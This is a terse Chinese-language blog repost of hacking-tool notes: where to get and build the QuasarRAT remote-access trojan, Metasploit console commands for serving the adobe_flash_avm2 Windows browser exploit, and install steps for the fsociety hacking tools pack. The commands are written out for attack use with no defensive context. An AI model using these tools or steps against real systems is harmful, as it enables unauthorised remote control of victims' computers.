QuasarRAT
github.com/quasar/QuasarRAT
命令环境 MINGW64 (GCC编译器)
mkdir RAT cd RAT git clone 下载URL 配置好一切以后在bin release client路径下有图形化界面,有命令行,有浏览器界面 parrot发行版
启动数据库让Metasploit可以更快的搜索和运行
service postgresql start msfconsole help use exploit/windows/browser/adobe_flash_avm2 show show options show payloads show targets show info exit msfconsole search type:exploit platform:windows flash use 复制粘贴 show options set SRVPORT 80 set SRVHOST IP地址 show options exploit渗透测试框架 fsociety Hacking Tools Pack - A Penetration Testing Framework github.com/Manisso/fsociety
cd /opt clear ls git clone URL地址 ls cd fsociety/ ls chmod +x install.sh ls ./install.sh cd fsociety转载于:https://www.cnblogs.com/sec875/p/11335600.html